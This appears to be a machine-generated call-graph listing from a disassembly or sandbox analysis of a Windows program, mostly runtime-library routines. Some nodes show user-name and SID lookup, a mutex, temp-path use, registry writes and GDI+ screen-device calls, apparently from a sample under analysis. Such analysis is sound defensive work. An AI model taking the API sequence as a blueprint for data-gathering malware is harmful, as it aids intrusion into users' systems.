17904->17905 17906 41588a 17905->17906 17908 41589c 17906->17908 17959 41a566 17906->17959 17909 4157d8 17908->17909 17965 415726 17909->17965 17912 420e27 18006 420b75 17912->18006 17915 420e72 18023 41afea 17915->18023 17916 420e59 17917 416424 __dosmaperr 14 API calls 17916->17917 17931 420e5e 17917->17931 17920 420e80 17924 416424 __dosmaperr 14 API calls 17920->17924 17921 420e97 18036 420ae0 CreateFileW 17921->18036 17923 416437 __dosmaperr 14 API calls 17949 420e6b 17923->17949 17926 420e85 17924->17926 17925 420ed0 17927 420f4d GetFileType 17925->17927 17929 420f22 GetLastError 17925->17929 18037 420ae0 CreateFileW 17925->18037 17928 416437 __dosmaperr 14 API calls 17926->17928 17930 420f58 GetLastError 17927->17930 17932 420f9f 17927->17932 17928->17931 17933 416401 __dosmaperr 14 API calls 17929->17933 17934 416401 __dosmaperr 14 API calls 17930->17934 17931->17923 18038 41af35 17932->18038 17933->17931 17936 420f66 CloseHandle 17934->17936 17936->17931 17939 420f8f 17936->17939 17938 420f15 17938->17927 17938->17929 17949->17896 17962 41a374 17959->17962 17963 41a4a3 __dosmaperr 5 API calls 17962->17963 17964 41a38a 17963->17964 17964->17908 17966 415734 17965->17966 17967 41574e 17965->17967 17983 4158b7 17966->17983 17969 415755 17967->17969 17970 415774 17967->17970 17971 41573e 17969->17971 17987 4158d1 17969->17987 17992 419d68 17970->17992 17971->17896 17971->17912 17973 415783 17975 41578a GetLastError 17973->17975 17977 4157b0 17973->17977 17979 4158d1 __wsopen_s 15 API calls 17973->17979 17995 416401 17975->17995 17977->17971 17980 419d68 __fassign MultiByteToWideChar 17977->17980 17979->17977 17982 4157c7 17980->17982 17981 416437 __dosmaperr 14 API calls 17981->17971 17982->17971 17982->17975 17984 4158c2 17983->17984 17985 4158ca 17983->17985 17986 419831 _free 14 API calls 17984->17986 17985->17971 17986->17985 17988 4158b7 __wsopen_s 14 API calls 17987->17988 17989 4158df 17988->17989 18000 415910 17989->18000 17993 419d79 MultiByteToWideChar 17992->17993 17993->17973 18003 416424 17995->18003 17997 41640c __dosmaperr 17998 416437 __dosmaperr 14 API calls 17997->17998 17999 415796 17998->17999 17999->17981 18001 419d1a __fread_nolock 15 API calls 18000->18001 18002 4158f0 18001->18002 18002->17971 18004 41a279 __dosmaperr 14 API calls 18003->18004 18005 416429 18004->18005 18005->17997 18007 420b96 18006->18007 18008 420bb0 18006->18008 18007->18008 18010 416437 __dosmaperr 14 API calls 18007->18010 18113 420b05 18008->18113 18011 420ba5 18010->18011 18012 417ea2 __wsopen_s 25 API calls 18011->18012 18012->18008 18013 420be8 18014 420c17 18013->18014 18016 416437 __dosmaperr 14 API calls 18013->18016 18017 420c6a 18014->18017 18120 418c45 18014->18120 18019 420c0c 18016->18019 18017->17915 18017->17916 18018 420c65 18018->18017 18021 417ecf __wsopen_s 11 API calls 18018->18021 18020 417ea2 __wsopen_s 25 API calls 18019->18020 18020->18014 18022 420cee 18021->18022 18024 41aff6 ___scrt_is_nonwritable_in_current_image 18023->18024 18127 419123 EnterCriticalSection 18024->18127 18026 41b044 18128 41b0f4 18026->18128 18027 41b022 18131 41adc4 18027->18131 18028 41affd 18028->18026 18028->18027 18033 41b091 EnterCriticalSection 18028->18033 18033->18026 18034 41b09e LeaveCriticalSection 18033->18034 18034->18028 18036->17925 18037->17938 18039 41af44 18038->18039 18040 41afad 18038->18040 18039->18040 18043 41af6a __wsopen_s 18039->18043 18041 416437 __dosmaperr 14 API calls 18040->18041 18114 420b1d 18113->18114 18115 420b38 18114->18115 18116 416437 __dosmaperr 14 API calls 18114->18116 18115->18013 18117 420b5c 18116->18117 18118 417ea2 __wsopen_s 25 API calls 18117->18118 18119 420b67 18118->18119 18119->18013 18121 418c51 18120->18121 18122 418c66 18120->18122 18123 416437 __dosmaperr 14 API calls 18121->18123 18122->18018 18124 418c56 18123->18124 18125 417ea2 __wsopen_s 25 API calls 18124->18125 18126 418c61 18125->18126 18126->18018 18127->18028 18139 41916b LeaveCriticalSection 18128->18139 18130 41b064 18130->17920 18130->17921 18132 41dfbf __dosmaperr 14 API calls 18131->18132 18135 41add6 18132->18135 18133 41ade3 18134 419831 _free 14 API calls 18133->18134 18136 41ae38 18134->18136 18135->18133 18140 41a6e1 18135->18140 18136->18026 18138 41af12 EnterCriticalSection 18136->18138 18138->18026 18139->18130 18141 41a4a3 __dosmaperr 5 API calls 18140->18141 18142 41a6fd 18141->18142 18143 41a71b InitializeCriticalSectionAndSpinCount 18142->18143 18144 41a706 18142->18144 18143->18144 18144->18135 18448->17902 18740 413298 18745 413798 SetUnhandledExceptionFilter 18740->18745 18742 41329d 18746 418eac 18742->18746 18744 4132a8 18745->18742 18747 418ed2 18746->18747 18748 418eb8 18746->18748 18747->18744 18748->18747 18749 416437 __dosmaperr 14 API calls 18748->18749 18750 418ec2 18749->18750 18751 417ea2 __wsopen_s 25 API calls 18750->18751 18752 418ecd 18751->18752 18752->18744 18931 4132aa 18932 4132b6 ___scrt_is_nonwritable_in_current_image 18931->18932 18957 412fd0 18932->18957 18934 4132bd 18935 413416 18934->18935 18945 4132e7 ___scrt_is_nonwritable_in_current_image __fassign ___scrt_release_startup_lock 18934->18945 18989 413633 IsProcessorFeaturePresent 18935->18989 18937 41341d 18993 4154ef 18937->18993 18940 4154b3 __fassign 23 API calls 18941 41342b 18940->18941 18942 413306 18943 413387 18965 4186a1 18943->18965 18945->18942 18945->18943 18978 4154c9 18945->18978 18947 41338d 18969 411c10 18947->18969 18958 412fd9 18957->18958 18996 413453 IsProcessorFeaturePresent 18958->18996 18962 412fea 18963 412fee 18962->18963 19006 413c11 18962->19006 18963->18934 18966 4186af 18965->18966 18967 4186aa 18965->18967 18966->18947 19067 418405 18967->19067 19286 409280 18969->19286 18979 418ee1 ___scrt_is_nonwritable_in_current_image 18978->18979 18980 4154df __dosmaperr 18978->18980 18981 41a122 __fassign 37 API calls 18979->18981 18980->18943 18982 418ef2 18981->18982 18983 418fd6 __fassign 37 API calls 18982->18983 18984 418f1c 18983->18984 18985 416437 __dosmaperr 14 API calls 18984->18985 18988 418f5b 18984->18988 18986 418f51 18985->18986 18987 417ea2 __wsopen_s 25 API calls 18986->18987 18987->18988 18988->18943 18990 413648 ___scrt_fastfail 18989->18990 18991 4136f3 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 18990->18991 18992 41373e ___scrt_fastfail 18991->18992 18992->18937 18994 41538d __fassign 23 API calls 18993->18994 18995 413423 18994->18995 18995->18940 18997 412fe5 18996->18997 18998 413bf2 18997->18998 19012 414154 18998->19012 19002 413c03 19003 413c0e 19002->19003 19026 414190 19002->19026 19003->18962 19005 413bfb 19005->18962 19007 413c24 19006->19007 19008 413c1a 19006->19008 19007->18963 19009 414139 ___vcrt_uninitialize_ptd 6 API calls 19008->19009 19010 413c1f 19009->19010 19011 414190 ___vcrt_uninitialize_locks DeleteCriticalSection 19010->19011 19011->19007 19013 41415d 19012->19013 19015 414186 19013->19015 19016 413bf7 19013->19016 19030 414568 19013->19030 19017 414190 ___vcrt_uninitialize_locks DeleteCriticalSection 19015->19017 19016->19005 19018 414106 19016->19018 19017->19016 19048 414479 19018->19048 19021 41411b 19021->19002 19024 414136 19024->19002 19027 41419b 19026->19027 19029 4141ba 19026->19029 19028 4141a5 DeleteCriticalSection 19027->19028 19028->19028 19028->19029 19029->19005 19035 414430 19030->19035 19033 4145a0 InitializeCriticalSectionAndSpinCount 19034 41458b 19033->19034 19034->19013 19036 41446b 19035->19036 19037 414448 19035->19037 19036->19033 19036->19034 19037->19036 19041 414384 19037->19041 19040 41445d GetProcAddress 19040->19036 19045 414393 ___vcrt_InitializeCriticalSectionEx 19041->19045 19042 4143ac LoadLibraryExW 19044 4143c7 GetLastError 19042->19044 19042->19045 19043 414425 19043->19036 19043->19040 19044->19045 19045->19042 19045->19043 19046 41440e FreeLibrary 19045->19046 19047 4143e6 LoadLibraryExW 19045->19047 19046->19045 19047->19045 19049 414430 ___vcrt_InitializeCriticalSectionEx 5 API calls 19048->19049 19050 414493 19049->19050 19051 4144ac TlsAlloc 19050->19051 19052 414110 19050->19052 19052->19021 19053 41452a 19052->19053 19054 414430 ___vcrt_InitializeCriticalSectionEx 5 API calls 19053->19054 19055 414544 19054->19055 19056 41455f TlsSetValue 19055->19056 19057 414129 19055->19057 19056->19057 19057->19024 19058 414139 19057->19058 19059 414143 19058->19059 19061 414149 19058->19061 19062 4144b4 19059->19062 19061->19021 19063 414430 ___vcrt_InitializeCriticalSectionEx 5 API calls 19062->19063 19064 4144ce 19063->19064 19065 4144e6 TlsFree 19064->19065 19066 4144da 19064->19066 19065->19066 19066->19061 19068 41840e 19067->19068 19072 418424 19067->19072 19068->19072 19073 418431 19068->19073 19070 41841b 19070->19072 19086 418583 19070->19086 19072->18966 19074 41843a 19073->19074 19075 41843d 19073->19075 19074->19070 19094 41ed4e 19075->19094 19080 41844f 19083 419831 _free 14 API calls 19080->19083 19084 41847e 19083->19084 19084->19070 19085 419831 _free 14 API calls 19085->19080 19087 4185f4 19086->19087 19092 418592 19086->19092 19087->19072 19088 41f00b WideCharToMultiByte __cftof 19088->19092 19089 41dfbf __dosmaperr 14 API calls 19089->19092 19090 4185f8 19091 419831 _free 14 API calls 19090->19091 19091->19087 19092->19087 19092->19088 19092->19089 19092->19090 19093 419831 _free 14 API calls 19092->19093 19093->19092 19095 41ed57 19094->19095 19099 418444 19094->19099 19129 41a1df 19095->19129 19100 41f0ef GetEnvironmentStringsW 19099->19100 19101 41f106 19100->19101 19111 41f15c 19100->19111 19104 41f00b __cftof WideCharToMultiByte 19101->19104 19102 41f165 FreeEnvironmentStringsW 19103 418449 19102->19103 19103->19080 19112 418484 19103->19112 19105 41f11f 19104->19105 19106 419d1a __fread_nolock 15 API calls 19105->19106 19105->19111 19107 41f12f 19106->19107 19108 41f00b __cftof WideCharToMultiByte 19107->19108 19109 41f147 19107->19109 19108->19109 19110 419831 _free 14 API calls 19109->19110 19110->19111 19111->19102 19111->19103 19113 418499 19112->19113 19114 41dfbf __dosmaperr 14 API calls 19113->19114 19125 4184c0 19114->19125 19115 419831 _free 14 API calls 19117 41845a 19115->19117 19116 418525 19116->19115 19117->19085 19118 41dfbf __dosmaperr 14 API calls 19118->19125 19119 418527 19280 418554 19119->19280 19120 418f7c ___std_exception_copy 25 API calls 19120->19125 19123 419831 _free 14 API calls 19123->19116 19124 418547 19126 417ecf __wsopen_s 11 API calls 19124->19126 19125->19116 19125->19118 19125->19119 19125->19120 19125->19124 19127 419831 _free 14 API calls 19125->19127 19128 418553 19126->19128 19127->19125 19130 41a1f0 19129->19130 19131 41a1ea 19129->19131 19132 41a69f __dosmaperr 6 API calls 19130->19132 19153 41a1f6 19130->19153 19133 41a660 __dosmaperr 6 API calls 19131->19133 19134 41a20a 19132->19134 19133->19130 19135 41dfbf __dosmaperr 14 API calls 19134->19135 19134->19153 19137 41a21a 19135->19137 19136 418fd6 __fassign 37 API calls 19138 41a278 19136->19138 19139 41a222 19137->19139 19140 41a237 19137->19140 19142 41a69f __dosmaperr 6 API calls 19139->19142 19143 41a69f __dosmaperr 6 API calls 19140->19143 19141 41a26f 19154 41eb95 19141->19154 19150 41a22e 19142->19150 19144 41a243 19143->19144 19145 41a247 19144->19145 19146 41a256 19144->19146 19147 41a69f __dosmaperr 6 API calls 19145->19147 19148 419f50 __dosmaperr 14 API calls 19146->19148 19147->19150 19151 41a261 19148->19151 19149 419831 _free 14 API calls 19149->19153 19150->19149 19152 419831 _free 14 API calls 19151->19152 19152->19153 19153->19136 19153->19141 19155 41ecae __fassign 37 API calls 19154->19155 19156 41eba8 19155->19156 19173 41e93e 19156->19173 19159 41ebc1 19159->19099 19160 419d1a __fread_nolock 15 API calls 19161 41ebd2 19160->19161 19168 41ec04 19161->19168 19180 41eda9 19161->19180 19164 419831 _free 14 API calls 19166 41ec12 19164->19166 19165 41ebff 19166->19099 19168->19164 19170 41ec1a 19174 4157f5 __fassign 37 API calls 19173->19174 19175 41e950 19174->19175 19176 41e971 19175->19176 19177 41e95f GetOEMCP 19175->19177 19178 41e976 GetACP 19176->19178 19179 41e988 19176->19179 19177->19179 19178->19179 19179->19159 19179->19160 19181 41e93e 39 API calls 19180->19181 19182 41edc9 19181->19182 19183 41ee3f ___scrt_fastfail 19182->19183 19185 41ee03 IsValidCodePage 19182->19185 19184 4139d2 _ValidateLocalCookies 5 API calls 19183->19184 19186 41ebf7 19184->19186 19185->19183 19187 41ee15 19185->19187 19186->19165 19186->19170 19188 41ee44 GetCPInfo 19187->19188 19190 41ee1e ___scrt_fastfail 19187->19190 19188->19183 19188->19190 19199 41ea14 19190->19199 19281 418561 19280->19281 19282 41852d 19280->19282 19283 418578 19281->19283 19284 419831 _free 14 API calls 19281->19284 19282->19123 19285 419831 _free 14 API calls 19283->19285 19284->19281 19285->19282 19287 409357 19286->19287 19288 409299 19286->19288 19304 407050 19287->19304 19289 4120d0 27 API calls 19288->19289 19290 4092a8 19289->19290 19291 402150 55 API calls 19290->19291 19292 4092b0 19291->19292 19315 4059c0 GetTempPathW 19292->19315 19294 4092c0 19295 412580 27 API calls 19294->19295 19296 4092cd 19295->19296 19297 4128e0 27 API calls 19296->19297 19298 40930d 19297->19298 19299 4120d0 27 API calls 19298->19299 19300 409340 19299->19300 19301 402150 55 API calls 19300->19301 19302 40934b 19301->19302 19303 412580 27 API calls 19302->19303 19303->19287 19324 402c50 GetUserNameW GetProcessHeap HeapAlloc GetUserNameW 19304->19324 19306 407063 19338 402e50 19306->19338 19308 407070 CreateMutexW GetLastError 19310 407188 19308->19310 19311 4154ef 23 API calls 19310->19311 19312 40718f 19311->19312 19313 417eb2 25 API calls 19312->19313 19314 407194 19313->19314 19316 405a00 19315->19316 19316->19316 19317 4122f0 27 API calls 19316->19317 19318 405a1f 19317->19318 19319 411c40 27 API calls 19318->19319 19321 405a59 19319->19321 19320 405a9e 19320->19294 19321->19320 19322 417eb2 25 API calls 19321->19322 19323 405ab6 19322->19323 19325 402e12 7 API calls 19324->19325 19326 402cad LookupAccountNameW GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 19324->19326 19325->19306 19326->19325 19327 402cf5 19326->19327 19327->19325 19328 402cfd LookupAccountNameW 19327->19328 19328->19325 19329 402d1c ConvertSidToStringSidW 19328->19329 19329->19325 19330 402d2f 19329->19330 19331 412440 27 API calls 19330->19331 19332 402da5 19331->19332 19333 412440 27 API calls 19332->19333 19335 402dd9 19333->19335 19334 402dff 19334->19306 19335->19334 19336 417eb2 25 API calls 19335->19336 19337 402e47 19336->19337 19348 4030bb 19338->19348 19349 402e7e 19338->19349 19339 412440 27 API calls 19345 4030ee 19339->19345 19340 40315c 19342 412570 27 API calls 19340->19342 19341 412440 27 API calls 19341->19349 19344 403161 19342->19344 19343 403144 19343->19308 19345->19343 19346 417eb2 25 API calls 19345->19346 19346->19340 19347 412b90 27 API calls 19347->19349 19348->19339 19349->19340 19349->19341 19349->19345 19349->19347 19349->19348 21434 424aa9 21435 424ab5 ___scrt_is_nonwritable_in_current_image 21434->21435 21442 419123 EnterCriticalSection 21435->21442 21437 424ac0 21443 424b08 21437->21443 21442->21437 21444 424b17 21443->21444 21445 424b2a 21443->21445 21446 416437 __dosmaperr 14 API calls 21444->21446 21448 424b78 21445->21448 21449 424b3c 21445->21449 21447 424b1c 21446->21447 21450 417ea2 __wsopen_s 25 API calls 21447->21450 21451 416437 __dosmaperr 14 API calls 21448->21451 21464 424a3c 21449->21464 21452 424ad6 21450->21452 21453 424b7d 21451->21453 21461 424aff 21452->21461 21455 417ea2 __wsopen_s 25 API calls 21453->21455 21455->21452 21457 418f7c ___std_exception_copy 25 API calls 21458 424b93 21457->21458 21458->21452 21459 417ecf __wsopen_s 11 API calls 21458->21459 21460 424bad 21459->21460 21468 41916b LeaveCriticalSection 21461->21468 21463 424aea 21465 424a49 21464->21465 21466 424496 41 API calls 21465->21466 21467 424a9c 21465->21467 21466->21465 21467->21452 21467->21457 21468->21463 17240 40ad42 17263 4120d0 17240->17263 17242 40ad53 17243 4120d0 27 API calls 17242->17243 17244 40ad69 17243->17244 17277 405560 17244->17277 17246 40ad70 17247 4120d0 27 API calls 17246->17247 17248 40ad81 17247->17248 17324 402150 17248->17324 17250 417eb2 25 API calls 17251 40b0a9 17250->17251 17252 417eb2 25 API calls 17251->17252 17254 40b0ae 17252->17254 17253 40ad88 17253->17250 17255 417eb2 25 API calls 17254->17255 17256 40b0b3 17255->17256 17257 417eb2 25 API calls 17256->17257 17258 40b0b8 17257->17258 17413 412eca 17258->17413 17264 4120f5 17263->17264 17265 4120fc 17264->17265 17266 41212f 17264->17266 17267 41214e 17264->17267 17265->17242 17268 412184 17266->17268 17269 412136 17266->17269 17272 412f2a 27 API calls 17267->17272 17275 412143 __fread_nolock 17267->17275 17270 402020 Concurrency::cancel_current_task 27 API calls 17268->17270 17271 412f2a 27 API calls 17269->17271 17273 41213c 17270->17273 17271->17273 17272->17275 17274 417eb2 25 API calls 17273->17274 17273->17275 17276 41218e 17274->17276 17275->17242 17278 40567e 17277->17278 17285 405579 17277->17285 17278->17246 17279 4120d0 27 API calls 17279->17285 17280 402150 55 API calls 17280->17285 17281 405699 17418 412570 17281->17418 17282 412440 27 API calls 17282->17285 17284 40569e 17286 417eb2 25 API calls 17284->17286 17285->17278 17285->17279 17285->17280 17285->17281 17285->17282 17285->17284 17287 4056a3 GetTempPathW 17286->17287 17289 4056f0 17287->17289 17289->17289 17421 4122f0 17289->17421 17291 40570f 17437 411c40 17291->17437 17293 405748 17294 405763 17293->17294 17451 411dd0 17293->17451 17295 412440 27 API calls 17294->17295 17296 405796 17295->17296 17298 4120d0 27 API calls 17296->17298 17299 4057a5 17298->17299 17300 402150 55 API calls 17299->17300 17301 4057ad 17300->17301 17468 412580 17301->17468 17303 417eb2 25 API calls 17306 4058bd 17303->17306 17304 4057bb 17304->17303 17305 4058a6 17304->17305 17305->17246 17307 4120d0 27 API calls 17306->17307 17308 4058d9 17307->17308 17309 402150 55 API calls 17308->17309 17310 4058e1 17309->17310 17311 4120d0 27 API calls 17310->17311 17312 4058f9 17311->17312 17313 402150 55 API calls 17312->17313 17314 405900 17313->17314 17315 4120d0 27 API calls 17314->17315 17316 405914 17315->17316 17317 402150 55 API calls 17316->17317 17318 40591b 17317->17318 17319 412580 27 API calls 17318->17319 17325 411c40 27 API calls 17324->17325 17326 40217c 17325->17326 17327 4021d1 17326->17327 17328 411dd0 27 API calls 17326->17328 17519 411f30 17327->17519 17328->17326 17330 402336 17331 417eb2 25 API calls 17330->17331 17348 40235c 17330->17348 17332 402374 ___scrt_fastfail 17331->17332 17334 4023a2 RegOpenKeyExA 17332->17334 17333 4021dd ___scrt_fastfail 17333->17330 17346 412440 27 API calls 17333->17346 17335 4023cb RegQueryValueExA 17334->17335 17336 4023ef RegCloseKey 17334->17336 17335->17336 17337 402412 17336->17337 17337->17337 17338 412440 27 API calls 17337->17338 17340 40242a 17338->17340 17339 402492 17339->17253 17340->17339 17341 417eb2 25 API calls 17340->17341 17342 4024a9 RegOpenKeyExA 17341->17342 17344 4024e3 RegSetValueExA 17342->17344 17345 40250d RegCloseKey 17342->17345 17344->17345 17347 40251e 17345->17347 17346->17330 17349 4025c4 17347->17349 17350 417eb2 25 API calls 17347->17350 17348->17253 17349->17253 17351 4025d7 GdiplusStartup 17350->17351 17524 412190 17351->17524 17355 402641 GetDC 17356 4120d0 27 API calls 17355->17356 17357 402728 17356->17357 17358 402150 27 API calls 17357->17358 17359 402730 17358->17359 17360 4120d0 27 API calls 17359->17360 17361 402748 17360->17361 17362 402150 27 API calls 17361->17362 17363 40274f 17362->17363 17364 4120d0 27 API calls 17363->17364 17540 412def 17413->17540 17416 413b86 Concurrency::cancel_current_task RaiseException 17417 412ee9 17416->17417 17476 412f0a 17418->17476 17424 412306 17421->17424 17425 412333 17421->17425 17422 412427 17423 412b80 27 API calls 17422->17423 17435 412398 __fread_nolock 17423->17435 17424->17291 17425->17422 17426 412422 17425->17426 17428 412387 17425->17428 17432 4123ae 17425->17432 17429 402020 Concurrency::cancel_current_task 27 API calls 17426->17429 17427 417eb2 25 API calls 17430 412431 17427->17430 17428->17426 17431 412392 17428->17431 17429->17422 17433 412f2a 27 API calls 17431->17433 17434 412f2a 27 API calls 17432->17434 17432->17435 17433->17435 17434->17435 17435->17427 17436 412409 17435->17436 17436->17291 17441 411c5b 17437->17441 17450 411d35 __fread_nolock 17437->17450 17438 411dc2 17439 412b80 27 API calls 17438->17439 17440 411dc7 17439->17440 17442 402020 Concurrency::cancel_current_task 27 API calls 17440->17442 17441->17438 17443 411ce2 17441->17443 17444 411cb8 17441->17444 17449 411cc9 __fread_nolock 17441->17449 17441->17450 17445 411dcc 17442->17445 17447 412f2a 27 API calls 17443->17447 17443->17449 17444->17440 17446 412f2a 27 API calls 17444->17446 17446->17449 17447->17449 17448 417eb2 25 API calls 17448->17438 17449->17448 17449->17450 17450->17293 17452 411e0a 17451->17452 17453 411dea 17451->17453 17454 411f16 17452->17454 17455 411e1c 17452->17455 17453->17293 17456 412b80 27 API calls 17454->17456 17458 411e79 17455->17458 17459 411e4f 17455->17459 17457 411f1b 17456->17457 17460 402020 Concurrency::cancel_current_task 27 API calls 17457->17460 17463 412f2a 27 API calls 17458->17463 17466 411e60 __fread_nolock 17458->17466 17459->17457 17461 411e5a 17459->17461 17460->17466 17462 412f2a 27 API calls 17461->17462 17462->17466 17463->17466 17464 417eb2 25 API calls 17465 411f25 17464->17465 17466->17464 17467 411edd __fread_nolock 17466->17467 17467->17293 17469 4125ed 17468->17469 17470 4125a3 17468->17470 17472 4125fc 17469->17472 17489 4128e0 17469->17489 17470->17469 17471 4125ac 17470->17471 17484 412b90 17471->17484 17472->17304 17475 4125b5 17475->17304 17481 412e7e 17476->17481 17479 413b86 Concurrency::cancel_current_task RaiseException 17480 412f29 17479->17480 17482 412d9f std::exception::exception 26 API calls 17481->17482 17483 412e90 17482->17483 17483->17479 17485 412ba4 17484->17485 17488 412bb5 __fread_nolock 17485->17488 17504 412c50 17485->17504 17487 412c3b 17487->17475 17488->17475 17490 412a1c 17489->17490 17491 412905 17489->17491 17492 412b80 27 API calls 17490->17492 17494 412940 17491->17494 17495 41296a 17491->17495 17493 412a21 17492->17493 17496 402020 Concurrency::cancel_current_task 27 API calls 17493->17496 17494->17493 17497 41294b 17494->17497 17499 412f2a 27 API calls 17495->17499 17502 412951 __fread_nolock 17495->17502 17496->17502 17498 412f2a 27 API calls 17497->17498 17498->17502 17499->17502 17500 417eb2 25 API calls 17501 412a2b 17500->17501 17502->17500 17503 4129da __fread_nolock 17502->17503 17503->17472 17505 412d77 17504->17505 17506 412c75 17504->17506 17507 412b80 27 API calls 17505->17507 17510 412cb0 17506->17510 17511 412cd7 17506->17511 17508 412d7c 17507->17508 17509 402020 Concurrency::cancel_current_task 27 API calls 17508->17509 17517 412cc1 __fread_nolock 17509->17517 17510->17508 17512 412cbb 17510->17512 17514 412f2a 27 API calls 17511->17514 17511->17517 17513 412f2a 27 API calls 17512->17513 17513->17517 17514->17517 17515 417eb2 25 API calls 17516 412d86 17515->17516 17517->17515 17518 412d3f __fread_nolock 17517->17518 17518->17487 17520 411f61 17519->17520 17521 411f3e 17519->17521 17520->17333 17521->17520 17522 417eb2 25 API calls 17521->17522 17523 411fac 17522->17523 17525 4121a6 17524->17525 17530 4121d9 17524->17530 17525->17355 17526 4122d7 17527 412b80 27 API calls 17526->17527 17535 41223f 17527->17535 17528 417eb2 25 API calls 17532 4122e1 17528->17532 17529 4122d2 17531 402020 Concurrency::cancel_current_task 27 API calls 17529->17531 17530->17526 17530->17529 17533 412255 17530->17533 17534 41222e 17530->17534 17531->17526 17533->17535 17538 412f2a 27 API calls 17533->17538 17534->17529 17536 412239 17534->17536 17535->17528 17539 4122b6 17535->17539 17537 412f2a 27 API calls 17536->17537 17537->17535 17538->17535 17539->17355 17541 412d9f std::exception::exception 26 API calls 17540->17541 17542 412e01 17541->17542 17542->17416 19350 406b6b GetFileAttributesA 19351 406b77 19350->19351 19352 406c37 19351->19352 19353 407039 19351->19353 19357 412440 27 API calls 19352->19357 19354 417eb2 25 API calls 19353->19354 19355 40703e 19354->19355 19356 417eb2 25 API calls 19355->19356 19358 407043 19356->19358 19359 407008 19357->19359 19360 417eb2 25 API calls 19358->19360 19361 407048 19360->19361 19362 40704d 19361->19362 19363 417eb2 25 API calls 19361->19363 19363->19362 16866 401900 16871 412440 16866->16871 16868 401911 16886 413196 16868->16886 16875 412456 16871->16875 16876 41247e 16871->16876 16872 41255c 16908 412b80 16872->16908 16874 412561 16911 402020 16874->16911 16875->16868 16876->16872 16878 4124c6 16876->16878 16879 4124eb 16876->16879 16878->16874 16882 412f2a 27 API calls 16878->16882 16883 4124d7 __fread_nolock 16879->16883 16889 412f2a 16879->16889 16882->16883 16884 41253e 16883->16884 16903 417eb2 16883->16903 16884->16868 17170 413169 16886->17170 16892 412f2f 16889->16892 16891 412f49 16891->16883 16892->16891 16894 412f4b 16892->16894 16917 417f03 16892->16917 16935 417f1d 16892->16935 16895 402020 Concurrency::cancel_current_task 16894->16895 16897 412f55 16894->16897 16924 413b86 16895->16924 16899 413b86 Concurrency::cancel_current_task RaiseException 16897->16899 16898 40203c 16927 413b04 16898->16927 16901 413452 16899->16901 16904 417e3e __wsopen_s 25 API calls 16903->16904 16905 417ec1 16904->16905 16906 417ecf __wsopen_s 11 API calls 16905->16906 16907 417ece 16906->16907 17159 412eea 16908->17159 16912 40202e Concurrency::cancel_current_task 16911->16912 16913 413b86 Concurrency::cancel_current_task RaiseException 16912->16913 16914 40203c 16913->16914 16915 413b04 ___std_exception_copy 26 API calls 16914->16915 16916 402063 16915->16916 16922 419d1a __dosmaperr 16917->16922 16918 419d58 16938 416437 16918->16938 16919 419d43 RtlAllocateHeap 16921 419d56 16919->16921 16919->16922 16921->16892 16922->16918 16922->16919 16923 417f1d __dosmaperr 2 API calls 16922->16923 16923->16922 16925 413bd0 RaiseException 16924->16925 16926 413ba0 16924->16926 16925->16898 16926->16925 16928 413b11 16927->16928 16934 402063 16927->16934 16929 417f03 ___std_exception_copy 15 API calls 16928->16929 16928->16934 16930 413b2e 16929->16930 16933 413b3e 16930->16933 17107 418f7c 16930->17107 17116 417997 16933->17116 16934->16883 17148 417f4a 16935->17148 16941 41a279 GetLastError 16938->16941 16940 41643c 16940->16921 16942 41a290 16941->16942 16943 41a296 16941->16943 16964 41a660 16942->16964 16961 41a29c SetLastError 16943->16961 16969 41a69f 16943->16969 16949 41a2c4 16950 41a2e3 16949->16950 16951 41a2cc 16949->16951 16952 41a69f __dosmaperr 6 API calls 16950->16952 16953 41a69f __dosmaperr 6 API calls 16951->16953 16954 41a2ef 16952->16954 16955 41a2da 16953->16955 16956 41a2f3 16954->16956 16957 41a304 16954->16957 16981 419831 16955->16981 16958 41a69f __dosmaperr 6 API calls 16956->16958 16987 419f50 16957->16987 16958->16955 16961->16940 16963 419831 _free 12 API calls 16963->16961 16992 41a4a3 16964->16992 16966 41a67c 16967 41a685 16966->16967 16968 41a697 TlsGetValue 16966->16968 16967->16943 16970 41a4a3 __dosmaperr 5 API calls 16969->16970 16971 41a6bb 16970->16971 16972 41a2b4 16971->16972 16973 41a6d9 TlsSetValue 16971->16973 16972->16961 16974 41dfbf 16972->16974 16979 41dfcc __dosmaperr 16974->16979 16975 41e00c 16977 416437 __dosmaperr 13 API calls 16975->16977 16976 41dff7 HeapAlloc 16978 41e00a 16976->16978 16976->16979 16977->16978 16978->16949 16979->16975 16979->16976 16980 417f1d __dosmaperr 2 API calls 16979->16980 16980->16979 16982 41983c HeapFree 16981->16982 16986 419865 __dosmaperr 16981->16986 16983 419851 16982->16983 16982->16986 16984 416437 __dosmaperr 12 API calls 16983->16984 16985 419857 GetLastError 16984->16985 16985->16986 16986->16961 17005 419de4 16987->17005 16993 41a4d1 16992->16993 16997 41a4cd __dosmaperr 16992->16997 16993->16997 16998 41a3dc 16993->16998 16996 41a4eb GetProcAddress 16996->16997 16997->16966 17003 41a3ed ___vcrt_InitializeCriticalSectionEx 16998->17003 16999 41a498 16999->16996 16999->16997 17000 41a40b LoadLibraryExW 17001 41a426 GetLastError 17000->17001 17000->17003 17001->17003 17002 41a481 FreeLibrary 17002->17003 17003->16999 17003->17000 17003->17002 17004 41a459 LoadLibraryExW 17003->17004 17004->17003 17006 419df0 ___scrt_is_nonwritable_in_current_image 17005->17006 17019 419123 EnterCriticalSection 17006->17019 17008 419dfa 17020 419e2a 17008->17020 17011 419ef6 17012 419f02 ___scrt_is_nonwritable_in_current_image 17011->17012 17024 419123 EnterCriticalSection 17012->17024 17014 419f0c 17025 41a0d7 17014->17025 17016 419f24 17029 419f44 17016->17029 17019->17008 17023 41916b LeaveCriticalSection 17020->17023 17022 419e18 17022->17011 17023->17022 17024->17014 17026 41a10d __fassign 17025->17026 17027 41a0e6 __fassign 17025->17027 17026->17016 17027->17026 17032 41fd5b 17027->17032 17106 41916b LeaveCriticalSection 17029->17106 17031 419f32 17031->16963 17033 41fddb 17032->17033 17036 41fd71 17032->17036 17035 419831 _free 14 API calls 17033->17035 17058 41fe29 17033->17058 17037 41fdfd 17035->17037 17036->17033 17040 419831 _free 14 API calls 17036->17040 17042 41fda4 17036->17042 17038 419831 _free 14 API calls 17037->17038 17041 41fe10 17038->17041 17039 41fe37 17048 41fe97 17039->17048 17050 419831 14 API calls _free 17039->17050 17044 41fd99 17040->17044 17045 419831 _free 14 API calls 17041->17045 17046 419831 _free 14 API calls 17042->17046 17059 41fdc6 17042->17059 17043 419831 _free 14 API calls 17047 41fdd0 17043->17047 17060 41f938 